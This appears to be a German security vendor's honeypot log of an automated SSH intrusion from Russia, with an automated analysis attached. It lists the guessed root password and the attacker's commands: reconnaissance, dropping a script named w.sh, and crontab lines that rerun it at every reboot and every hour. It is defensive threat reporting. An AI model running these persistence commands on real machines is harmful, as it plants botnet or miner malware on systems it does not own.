ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Russland: Hardware ausspähen und Einnisten per Cronjob

04.10.2026, 15:13 UTC · 11 Befehle · über ssh · Russland · 2× wiederholt

Überblick

Dienst
ssh (Port 22)
Herkunft
Russland · Yug-Telecom-K Ltd.
Probierte Zugangsdaten
root / Vk$@+V#e-oSBgIG
Gleiche Sitzung gesehen
2×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a
Linux api-01 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:46:11 UTC 2023 x86_64 GNU/Linux
root@srv01:~$ sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
/
root@srv01:~$ cat /proc/cpuinfo | grep processor | wc -l
4
root@srv01:~$ cd "/" && if [ ! -f "w.sh" ]; then cat > "w.sh" && chmod +x w.sh; fi
bash: w.sh: No such file or directory
root@srv01:~$ CRON="$(crontab -l 2>/dev/null || true)"
root@srv01:~$ echo "$CRON" | grep -F '//w.sh "astats" "netai" "kstats" "ssh 2 az"' >/dev/null 2>&1 || \
bash: syntax error near unexpected token `||'
root@srv01:~$ printf '%s\n%s\n' "@reboot  //w.sh "astats" "netai" "kstats" "ssh 2 az"" "0 * * * * cd "/" && ./w.sh "astats" "netai" "kstats" "ssh 2 az"" | (cat -; echo "$CRON") | crontab -
bash: syntax error near unexpected token `('
root@srv01:~$ ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
  PID %CPU COMMAND
  1234  2.3 python3
  5678  1.1 nginx
  9012  0.8 sshd
  3456  0.5 systemd-journal
  7890  0.3 systemd-logind
  2345  0.2 cron
  6789  0.1 rsyslogd
  1111  0.0 bash
  2222  0.0 ps
  3333  0.0 head
root@srv01:~$ ps aux | grep netai | grep -v grep | wc -l
0
root@srv01:~$ cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai
root@srv01:~$ cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai
bash: netai: No such file or directory

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit einem generierten Root-Passwort über SSH an. Er prüfte zunächst die Systemumgebung und die CPU-Kapazität. Anschließend versuchte er, ein Skript namens w.sh im Wurzelverzeichnis abzulegen. Danach manipulierte er die Cron-Jobs, um dieses Skript regelmäßig auszuführen. Zuletzt versuchte er, eine Datei namens netai in temporären Verzeichnissen zu erstellen.

Was die Befehle bewirken

uname -a liefert Informationen über das Betriebssystem und die Architektur. Die Schleife sucht nach einem beschreibbaren Verzeichnis für die Ablage von Dateien. cat /proc/cpuinfo zählt die verfügbaren Prozessorkerne. Der Befehl crontab -l liest die bestehenden Zeitpläne, um diese nicht zu überschreiben. Die printf-Anweisung fügt neue Einträge hinzu, die das Skript w.sh bei jedem Neustart und stündlich aufrufen. Die ps-Befehle prüfen, ob bereits ähnliche Prozesse laufen, um Konflikte zu vermeiden.

Worauf es hinauslief

Das Ziel ist die Installation einer Persistenz-Komponente für ein Botnetz oder einen Kryptominer. Die Verwendung von Cron-Jobs mit spezifischen Parametern wie netai deutet auf eine automatisierte Hintergrundaktivität hin. Die Prüfung der CPU-Kerne ist typisch für Mining-Software, die die Rechenleistung maximieren will.

Einordnung

Dieses Muster ist sehr verbreitet bei automatisierten Botnetzen, die nach schwachen Root-Passwörtern suchen. Die spezifischen Argumente im Cron-Job deuten auf eine bekannte Malware-Familie hin, die oft in Cloud-Umgebungen aktiv ist.